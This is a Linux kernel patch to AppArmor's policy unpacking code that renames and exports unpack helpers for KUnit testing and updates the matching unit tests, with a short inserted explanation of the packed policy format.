+  * Returns: false if either match fails, the read head does not move
+  */
+-static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ {
+ 	/*
+ 	 * May need to reset pos if name or type doesn't match
+@@ -277,9 +244,9 @@ static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ 	 * Check for presence of a tagname, and if present name size
+ 	 * AA_NAME tag value is a u16.
+ 	 */
+-	if (unpack_X(e, AA_NAME)) {
++	if (aa_unpack_X(e, AA_NAME)) {
+ 		char *tag = NULL;
+-		size_t size = unpack_u16_chunk(e, &tag);
++		size_t size = aa_unpack_u16_chunk(e, &tag);
+ 		/* if a name is specified it must match. otherwise skip tag */
+ 		if (name && (!size || tag[size-1] != '\0' || strcmp(name, tag)))
+ 			goto fail;
+@@ -289,20 +256,21 @@ static bool unpack_nameX(struct aa_ext *e, enum aa_code code, const char *name)
+ 	}
+ 
+ 	/* now check if type code matches */
+-	if (unpack_X(e, code))
++	if (aa_unpack_X(e, code))
+ 		return true;
+ 
+ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_nameX);
+ 
+ static bool unpack_u8(struct aa_ext *e, u8 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U8, name)) {
+-		if (!inbounds(e, sizeof(u8)))
++	if (aa_unpack_nameX(e, AA_U8, name)) {
++		if (!aa_inbounds(e, sizeof(u8)))
+ 			goto fail;
+ 		if (data)
+ 			*data = *((u8 *)e->pos);
+@@ -315,12 +283,12 @@ fail:
+ 	return false;
+ }
+ 
+-static bool unpack_u32(struct aa_ext *e, u32 *data, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_u32(struct aa_ext *e, u32 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U32, name)) {
+-		if (!inbounds(e, sizeof(u32)))
++	if (aa_unpack_nameX(e, AA_U32, name)) {
++		if (!aa_inbounds(e, sizeof(u32)))
+ 			goto fail;
+ 		if (data)
+ 			*data = le32_to_cpu(get_unaligned((__le32 *) e->pos));
+@@ -332,13 +300,14 @@ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u32);
+ 
+-static bool unpack_u64(struct aa_ext *e, u64 *data, const char *name)
++VISIBLE_IF_KUNIT bool aa_unpack_u64(struct aa_ext *e, u64 *data, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_U64, name)) {
+-		if (!inbounds(e, sizeof(u64)))
++	if (aa_unpack_nameX(e, AA_U64, name)) {
++		if (!aa_inbounds(e, sizeof(u64)))
+ 			goto fail;
+ 		if (data)
+ 			*data = le64_to_cpu(get_unaligned((__le64 *) e->pos));
+@@ -350,14 +319,15 @@ fail:
+ 	e->pos = pos;
+ 	return false;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_u64);
+ 
+-static size_t unpack_array(struct aa_ext *e, const char *name)
++VISIBLE_IF_KUNIT size_t aa_unpack_array(struct aa_ext *e, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_ARRAY, name)) {
++	if (aa_unpack_nameX(e, AA_ARRAY, name)) {
+ 		int size;
+-		if (!inbounds(e, sizeof(u16)))
++		if (!aa_inbounds(e, sizeof(u16)))
+ 			goto fail;
+ 		size = (int)le16_to_cpu(get_unaligned((__le16 *) e->pos));
+ 		e->pos += sizeof(u16);
+@@ -368,18 +338,19 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_array);
+ 
+-static size_t unpack_blob(struct aa_ext *e, char **blob, const char *name)
++VISIBLE_IF_KUNIT size_t aa_unpack_blob(struct aa_ext *e, char **blob, const char *name)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_BLOB, name)) {
++	if (aa_unpack_nameX(e, AA_BLOB, name)) {
+ 		u32 size;
+-		if (!inbounds(e, sizeof(u32)))
++		if (!aa_inbounds(e, sizeof(u32)))
+ 			goto fail;
+ 		size = le32_to_cpu(get_unaligned((__le32 *) e->pos));
+ 		e->pos += sizeof(u32);
+-		if (inbounds(e, (size_t) size)) {
++		if (aa_inbounds(e, (size_t) size)) {
+ 			*blob = e->pos;
+ 			e->pos += size;
+ 			return size;
+@@ -390,15 +361,16 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_blob);
+ 
+-static int unpack_str(struct aa_ext *e, const char **string, const char *name)
++VISIBLE_IF_KUNIT int aa_unpack_str(struct aa_ext *e, const char **string, const char *name)
+ {
+ 	char *src_str;
+ 	size_t size = 0;
+ 	void *pos = e->pos;
+ 	*string = NULL;
+-	if (unpack_nameX(e, AA_STRING, name)) {
+-		size = unpack_u16_chunk(e, &src_str);
++	if (aa_unpack_nameX(e, AA_STRING, name)) {
++		size = aa_unpack_u16_chunk(e, &src_str);
+ 		if (size) {
+ 			/* strings are null terminated, length is size - 1 */
+ 			if (src_str[size - 1] != 0)
+@@ -413,12 +385,13 @@ fail:
+ 	e->pos = pos;
+ 	return 0;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_str);
+ 
+-static int unpack_strdup(struct aa_ext *e, char **string, const char *name)
++VISIBLE_IF_KUNIT int aa_unpack_strdup(struct aa_ext *e, char **string, const char *name)
+ {
+ 	const char *tmp;
+ 	void *pos = e->pos;
+-	int res = unpack_str(e, &tmp, name);
++	int res = aa_unpack_str(e, &tmp, name);
+ 	*string = NULL;
+ 
+ 	if (!res)
+@@ -432,6 +405,7 @@ static int unpack_strdup(struct aa_ext *e, char **string, const char *name)
+ 
+ 	return res;
+ }
++EXPORT_SYMBOL_IF_KUNIT(aa_unpack_strdup);
+ 
+ 
+ /**
+@@ -446,7 +420,7 @@ static struct aa_dfa *unpack_dfa(struct aa_ext *e)
+ 	size_t size;
+ 	struct aa_dfa *dfa = NULL;
+ 
+-	size = unpack_blob(e, &blob, "aadfa");
++	size = aa_unpack_blob(e, &blob, "aadfa");
+ 	if (size) {
+ 		/*
+ 		 * The dfa is aligned with in the blob to 8 bytes
+@@ -482,10 +456,10 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 	void *saved_pos = e->pos;
+ 
+ 	/* exec table is optional */
+-	if (unpack_nameX(e, AA_STRUCT, "xtable")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "xtable")) {
+ 		int i, size;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		/* currently 4 exec bits and entries 0-3 are reserved iupcx */
+ 		if (size > 16 - 4)
+ 			goto fail;
+@@ -497,8 +471,8 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 		profile->file.trans.size = size;
+ 		for (i = 0; i < size; i++) {
+ 			char *str;
+-			int c, j, pos, size2 = unpack_strdup(e, &str, NULL);
+-			/* unpack_strdup verifies that the last character is
++			int c, j, pos, size2 = aa_unpack_strdup(e, &str, NULL);
++			/* aa_unpack_strdup verifies that the last character is
+ 			 * null termination byte.
+ 			 */
+ 			if (!size2)
+@@ -521,7 +495,7 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 					goto fail;
+ 				/* beginning with : requires an embedded \0,
+ 				 * verify that exactly 1 internal \0 exists
+-				 * trailing \0 already verified by unpack_strdup
++				 * trailing \0 already verified by aa_unpack_strdup
+ 				 *
+ 				 * convert \0 back to : for label_parse
+ 				 */
+@@ -533,9 +507,9 @@ static bool unpack_trans_table(struct aa_ext *e, struct aa_profile *profile)
+ 				/* fail - all other cases with embedded \0 */
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 	return true;
+@@ -550,21 +524,21 @@ static bool unpack_xattrs(struct aa_ext *e, struct aa_profile *profile)
+ {
+ 	void *pos = e->pos;
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "xattrs")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "xattrs")) {
+ 		int i, size;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		profile->xattr_count = size;
+ 		profile->xattrs = kcalloc(size, sizeof(char *), GFP_KERNEL);
+ 		if (!profile->xattrs)
+ 			goto fail;
+ 		for (i = 0; i < size; i++) {
+-			if (!unpack_strdup(e, &profile->xattrs[i], NULL))
++			if (!aa_unpack_strdup(e, &profile->xattrs[i], NULL))
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -580,8 +554,8 @@ static bool unpack_secmark(struct aa_ext *e, struct aa_profile *profile)
+ 	void *pos = e->pos;
+ 	int i, size;
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "secmark")) {
+-		size = unpack_array(e, NULL);
++	if (aa_unpack_nameX(e, AA_STRUCT, "secmark")) {
++		size = aa_unpack_array(e, NULL);
+ 
+ 		profile->secmark = kcalloc(size, sizeof(struct aa_secmark),
+ 					   GFP_KERNEL);
+@@ -595,12 +569,12 @@ static bool unpack_secmark(struct aa_ext *e, struct aa_profile *profile)
+ 				goto fail;
+ 			if (!unpack_u8(e, &profile->secmark[i].deny, NULL))
+ 				goto fail;
+-			if (!unpack_strdup(e, &profile->secmark[i].label, NULL))
++			if (!aa_unpack_strdup(e, &profile->secmark[i].label, NULL))
+ 				goto fail;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -624,26 +598,26 @@ static bool unpack_rlimits(struct aa_ext *e, struct aa_profile *profile)
+ 	void *pos = e->pos;
+ 
+ 	/* rlimits are optional */
+-	if (unpack_nameX(e, AA_STRUCT, "rlimits")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "rlimits")) {
+ 		int i, size;
+ 		u32 tmp = 0;
+-		if (!unpack_u32(e, &tmp, NULL))
++		if (!aa_unpack_u32(e, &tmp, NULL))
+ 			goto fail;
+ 		profile->rlimits.mask = tmp;
+ 
+-		size = unpack_array(e, NULL);
++		size = aa_unpack_array(e, NULL);
+ 		if (size > RLIM_NLIMITS)
+ 			goto fail;
+ 		for (i = 0; i < size; i++) {
+ 			u64 tmp2 = 0;
+ 			int a = aa_map_resource(i);
+-			if (!unpack_u64(e, &tmp2, NULL))
++			if (!aa_unpack_u64(e, &tmp2, NULL))
+ 				goto fail;
+ 			profile->rlimits.limits[a].rlim_max = tmp2;
+ 		}
+-		if (!unpack_nameX(e, AA_ARRAYEND, NULL))
++		if (!aa_unpack_nameX(e, AA_ARRAYEND, NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 	return true;
+@@ -682,7 +656,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	const char *info = "failed to unpack profile";
+ 	size_t ns_len;
+ 	struct rhashtable_params params = { 0 };
+-	char *key = NULL;
++	char *key = NULL, *disconnected = NULL;
+ 	struct aa_data *data;
+ 	int i, error = -EPROTO;
+ 	kernel_cap_t tmpcap;
+@@ -691,9 +665,9 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	*ns_name = NULL;
+ 
+ 	/* check that we have the right struct being passed */
+-	if (!unpack_nameX(e, AA_STRUCT, "profile"))
++	if (!aa_unpack_nameX(e, AA_STRUCT, "profile"))
+ 		goto fail;
+-	if (!unpack_str(e, &name, NULL))
++	if (!aa_unpack_str(e, &name, NULL))
+ 		goto fail;
+ 	if (*name == '\0')
+ 		goto fail;
+@@ -713,10 +687,10 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	/* profile renaming is optional */
+-	(void) unpack_str(e, &profile->rename, "rename");
++	(void) aa_unpack_str(e, &profile->rename, "rename");
+ 
+ 	/* attachment string is optional */
+-	(void) unpack_str(e, &profile->attach, "attach");
++	(void) aa_unpack_str(e, &profile->attach, "attach");
+ 
+ 	/* xmatch is optional and may be NULL */
+ 	profile->xmatch = unpack_dfa(e);
+@@ -728,7 +702,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	}
+ 	/* xmatch_len is not optional if xmatch is set */
+ 	if (profile->xmatch) {
+-		if (!unpack_u32(e, &tmp, NULL)) {
++		if (!aa_unpack_u32(e, &tmp, NULL)) {
+ 			info = "missing xmatch len";
+ 			goto fail;
+ 		}
+@@ -736,15 +710,16 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	}
+ 
+ 	/* disconnected attachment string is optional */
+-	(void) unpack_str(e, &profile->disconnected, "disconnected");
++	(void) aa_unpack_strdup(e, &disconnected, "disconnected");
++	profile->disconnected = disconnected;
+ 
+ 	/* per profile debug flags (complain, audit) */
+-	if (!unpack_nameX(e, AA_STRUCT, "flags")) {
++	if (!aa_unpack_nameX(e, AA_STRUCT, "flags")) {
+ 		info = "profile missing flags";
+ 		goto fail;
+ 	}
+ 	info = "failed to unpack profile flags";
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp & PACKED_FLAG_HAT)
+ 		profile->label.flags |= FLAG_HAT;
+@@ -752,7 +727,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		profile->label.flags |= FLAG_DEBUG1;
+ 	if (tmp & PACKED_FLAG_DEBUG2)
+ 		profile->label.flags |= FLAG_DEBUG2;
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp == PACKED_MODE_COMPLAIN || (e->version & FORCE_COMPLAIN_FLAG)) {
+ 		profile->mode = APPARMOR_COMPLAIN;
+@@ -766,16 +741,16 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 	} else {
+ 		goto fail;
+ 	}
+-	if (!unpack_u32(e, &tmp, NULL))
++	if (!aa_unpack_u32(e, &tmp, NULL))
+ 		goto fail;
+ 	if (tmp)
+ 		profile->audit = AUDIT_ALL;
+ 
+-	if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++	if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 		goto fail;
+ 
+ 	/* path_flags is optional */
+-	if (unpack_u32(e, &profile->path_flags, "path_flags"))
++	if (aa_unpack_u32(e, &profile->path_flags, "path_flags"))
+ 		profile->path_flags |= profile->label.flags &
+ 			PATH_MEDIATE_DELETED;
+ 	else
+@@ -783,38 +758,38 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		profile->path_flags = PATH_MEDIATE_DELETED;
+ 
+ 	info = "failed to unpack profile capabilities";
+-	if (!unpack_u32(e, &(profile->caps.allow.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.allow.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &(profile->caps.audit.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.audit.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &(profile->caps.quiet.cap[0]), NULL))
++	if (!aa_unpack_u32(e, &(profile->caps.quiet.cap[0]), NULL))
+ 		goto fail;
+-	if (!unpack_u32(e, &tmpcap.cap[0], NULL))
++	if (!aa_unpack_u32(e, &tmpcap.cap[0], NULL))
+ 		goto fail;
+ 
+ 	info = "failed to unpack upper profile capabilities";
+-	if (unpack_nameX(e, AA_STRUCT, "caps64")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "caps64")) {
+ 		/* optional upper half of 64 bit caps */
+-		if (!unpack_u32(e, &(profile->caps.allow.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.allow.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.audit.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.audit.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.quiet.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.quiet.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(tmpcap.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(tmpcap.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+ 	info = "failed to unpack extended profile capabilities";
+-	if (unpack_nameX(e, AA_STRUCT, "capsx")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "capsx")) {
+ 		/* optional extended caps mediation mask */
+-		if (!unpack_u32(e, &(profile->caps.extended.cap[0]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.extended.cap[0]), NULL))
+ 			goto fail;
+-		if (!unpack_u32(e, &(profile->caps.extended.cap[1]), NULL))
++		if (!aa_unpack_u32(e, &(profile->caps.extended.cap[1]), NULL))
+ 			goto fail;
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	}
+ 
+@@ -833,7 +808,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		goto fail;
+ 	}
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "policydb")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "policydb")) {
+ 		/* generic policy dfa - optional and may be NULL */
+ 		info = "failed to unpack policydb";
+ 		profile->policy.dfa = unpack_dfa(e);
+@@ -845,7 +820,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			error = -EPROTO;
+ 			goto fail;
+ 		}
+-		if (!unpack_u32(e, &profile->policy.start[0], "start"))
++		if (!aa_unpack_u32(e, &profile->policy.start[0], "start"))
+ 			/* default start state */
+ 			profile->policy.start[0] = DFA_START;
+ 		/* setup class index */
+@@ -855,7 +830,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 					    profile->policy.start[0],
+ 					    i);
+ 		}
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL))
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL))
+ 			goto fail;
+ 	} else
+ 		profile->policy.dfa = aa_get_dfa(nulldfa);
+@@ -868,7 +843,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		info = "failed to unpack profile file rules";
+ 		goto fail;
+ 	} else if (profile->file.dfa) {
+-		if (!unpack_u32(e, &profile->file.start, "dfa_start"))
++		if (!aa_unpack_u32(e, &profile->file.start, "dfa_start"))
+ 			/* default start state */
+ 			profile->file.start = DFA_START;
+ 	} else if (profile->policy.dfa &&
+@@ -883,7 +858,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 		goto fail;
+ 	}
+ 
+-	if (unpack_nameX(e, AA_STRUCT, "data")) {
++	if (aa_unpack_nameX(e, AA_STRUCT, "data")) {
+ 		info = "out of memory";
+ 		profile->data = kzalloc(sizeof(*profile->data), GFP_KERNEL);
+ 		if (!profile->data)
+@@ -901,7 +876,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			goto fail;
+ 		}
+ 
+-		while (unpack_strdup(e, &key, NULL)) {
++		while (aa_unpack_strdup(e, &key, NULL)) {
+ 			data = kzalloc(sizeof(*data), GFP_KERNEL);
+ 			if (!data) {
+ 				kfree_sensitive(key);
+@@ -909,7 +884,7 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			}
+ 
+ 			data->key = key;
+-			data->size = unpack_blob(e, &data->data, NULL);
++			data->size = aa_unpack_blob(e, &data->data, NULL);
+ 			data->data = kvmemdup(data->data, data->size);
+ 			if (data->size && !data->data) {
+ 				kfree_sensitive(data->key);
+@@ -926,13 +901,13 @@ static struct aa_profile *unpack_profile(struct aa_ext *e, char **ns_name)
+ 			}
+ 		}
+ 
+-		if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
++		if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL)) {
+ 			info = "failed to unpack end of key, value data table";
+ 			goto fail;
+ 		}
+ 	}
+ 
+-	if (!unpack_nameX(e, AA_STRUCTEND, NULL)) {
++	if (!aa_unpack_nameX(e, AA_STRUCTEND, NULL)) {
+ 		info = "failed to unpack end of profile";
+ 		goto fail;
+ 	}
+@@ -965,7 +940,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	*ns = NULL;
+ 
+ 	/* get the interface version */
+-	if (!unpack_u32(e, &e->version, "version")) {
++	if (!aa_unpack_u32(e, &e->version, "version")) {
+ 		if (required) {
+ 			audit_iface(NULL, NULL, NULL, "invalid profile format",
+ 				    e, error);
+@@ -984,7 +959,7 @@ static int verify_header(struct aa_ext *e, int required, const char **ns)
+ 	}
+ 
+ 	/* read the namespace if present */
+-	if (unpack_str(e, &name, "namespace")) {
++	if (aa_unpack_str(e, &name, "namespace")) {
+ 		if (*name == '\0') {
+ 			audit_iface(NULL, NULL, NULL, "invalid namespace name",
+ 				    e, error);
+@@ -1256,7 +1231,3 @@ fail:
+ 
+ 	return error;
+ }
+-
+-#ifdef CONFIG_SECURITY_APPARMOR_KUNIT_TEST
+-#include "policy_unpack_test.c"
+-#endif /* CONFIG_SECURITY_APPARMOR_KUNIT_TEST */
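
A quick orientation to the format these unpackers consume: every element is a one-byte aa_code, and a named element is preceded by an AA_NAME tag plus a u16-sized, NUL-terminated name chunk. For example, a named u32 "version" with value 5 would be laid out like this (illustrative bytes, little-endian, following the aa_code enum above):

    static const unsigned char example[] = {
        AA_NAME,			/* a name chunk follows */
        0x08, 0x00,			/* u16 name length, incl. NUL */
        'v', 'e', 'r', 's', 'i', 'o', 'n', '\0',
        AA_U32,				/* type code of the element */
        0x05, 0x00, 0x00, 0x00,		/* le32 payload */
    };

    /* aa_unpack_u32(e, &val, "version") matches the AA_NAME chunk,
     * then the AA_U32 code, then reads the 4-byte payload; on any
     * mismatch e->pos is rewound and it returns false. */
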
+diff --git a/security/apparmor/policy_unpack_test.c b/security/apparmor/policy_unpack_test.c
+index 0a969b2e03dba..f25cf2a023d57 100644
+--- a/security/apparmor/policy_unpack_test.c
++++ b/security/apparmor/policy_unpack_test.c
+@@ -4,6 +4,7 @@
+  */
+ 
+ #include <kunit/test.h>
++#include <kunit/visibility.h>
+ 
+ #include "include/policy.h"
+ #include "include/policy_unpack.h"
+@@ -43,6 +44,8 @@
+ #define TEST_ARRAY_BUF_OFFSET \
+ 	(TEST_NAMED_ARRAY_BUF_OFFSET + 3 + strlen(TEST_ARRAY_NAME) + 1)
+ 
++MODULE_IMPORT_NS(EXPORTED_FOR_KUNIT_TESTING);
++
+ struct policy_unpack_fixture {
+ 	struct aa_ext *e;
+ 	size_t e_size;
+@@ -125,16 +128,16 @@ static void policy_unpack_test_inbounds_when_inbounds(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+ 
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, 0));
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, puf->e_size / 2));
+-	KUNIT_EXPECT_TRUE(test, inbounds(puf->e, puf->e_size));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, 0));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, puf->e_size / 2));
++	KUNIT_EXPECT_TRUE(test, aa_inbounds(puf->e, puf->e_size));
+ }
+ 
+ static void policy_unpack_test_inbounds_when_out_of_bounds(struct kunit *test)
+ {
+ 	struct policy_unpack_fixture *puf = test->priv;
+ 
+-	KUNIT_EXPECT_FALSE(test, inbounds(puf->e, puf->e_size + 1));
++	KUNIT_EXPECT_FALSE(test, aa_inbounds(puf->e, puf->e_size + 1));
+ }
+ 
+ static void policy_unpack_test_unpack_array_with_null_name(struct kunit *test)
+@@ -144,7 +147,7 @@ static void policy_unpack_test_unpack_array_with_null_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_ARRAY_BUF_OFFSET;
+ 
+-	array_size = unpack_array(puf->e, NULL);
++	array_size = aa_unpack_array(puf->e, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, (u16)TEST_ARRAY_SIZE);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -159,7 +162,7 @@ static void policy_unpack_test_unpack_array_with_name(struct kunit *test)
+ 
+ 	puf->e->pos += TEST_NAMED_ARRAY_BUF_OFFSET;
+ 
+-	array_size = unpack_array(puf->e, name);
++	array_size = aa_unpack_array(puf->e, name);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, (u16)TEST_ARRAY_SIZE);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -175,7 +178,7 @@ static void policy_unpack_test_unpack_array_out_of_bounds(struct kunit *test)
+ 	puf->e->pos += TEST_NAMED_ARRAY_BUF_OFFSET;
+ 	puf->e->end = puf->e->start + TEST_ARRAY_BUF_OFFSET + sizeof(u16);
+ 
+-	array_size = unpack_array(puf->e, name);
++	array_size = aa_unpack_array(puf->e, name);
+ 
+ 	KUNIT_EXPECT_EQ(test, array_size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos,
+@@ -189,7 +192,7 @@ static void policy_unpack_test_unpack_blob_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_BLOB_BUF_OFFSET;
+-	size = unpack_blob(puf->e, &blob, NULL);
++	size = aa_unpack_blob(puf->e, &blob, NULL);
+ 
+ 	KUNIT_ASSERT_EQ(test, size, TEST_BLOB_DATA_SIZE);
+ 	KUNIT_EXPECT_TRUE(test,
+@@ -203,7 +206,7 @@ static void policy_unpack_test_unpack_blob_with_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_NAMED_BLOB_BUF_OFFSET;
+-	size = unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
++	size = aa_unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
+ 
+ 	KUNIT_ASSERT_EQ(test, size, TEST_BLOB_DATA_SIZE);
+ 	KUNIT_EXPECT_TRUE(test,
+@@ -222,7 +225,7 @@ static void policy_unpack_test_unpack_blob_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->start + TEST_BLOB_BUF_OFFSET
+ 		+ TEST_BLOB_DATA_SIZE - 1;
+ 
+-	size = unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
++	size = aa_unpack_blob(puf->e, &blob, TEST_BLOB_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos, start);
+@@ -235,7 +238,7 @@ static void policy_unpack_test_unpack_str_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_STRING_BUF_OFFSET;
+-	size = unpack_str(puf->e, &string, NULL);
++	size = aa_unpack_str(puf->e, &string, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_STREQ(test, string, TEST_STRING_DATA);
+@@ -247,7 +250,7 @@ static void policy_unpack_test_unpack_str_with_name(struct kunit *test)
+ 	const char *string = NULL;
+ 	size_t size;
+ 
+-	size = unpack_str(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_str(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
+ 	KUNIT_EXPECT_STREQ(test, string, TEST_STRING_DATA);
+@@ -263,7 +266,7 @@ static void policy_unpack_test_unpack_str_out_of_bounds(struct kunit *test)
+ 	puf->e->end = puf->e->pos + TEST_STRING_BUF_OFFSET
+ 		+ strlen(TEST_STRING_DATA) - 1;
+ 
+-	size = unpack_str(puf->e, &string, TEST_STRING_NAME);
++	size = aa_unpack_str(puf->e, &string, TEST_STRING_NAME);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, 0);
+ 	KUNIT_EXPECT_PTR_EQ(test, puf->e->pos, start);
+@@ -276,7 +279,7 @@ static void policy_unpack_test_unpack_strdup_with_null_name(struct kunit *test)
+ 	size_t size;
+ 
+ 	puf->e->pos += TEST_STRING_BUF_OFFSET;
+-	size = unpack_strdup(puf->e, &string, NULL);
++	size = aa_unpack_strdup(puf->e, &string, NULL);
+ 
+ 	KUNIT_EXPECT_EQ(test, size, strlen(TEST_STRING_DATA) + 1);
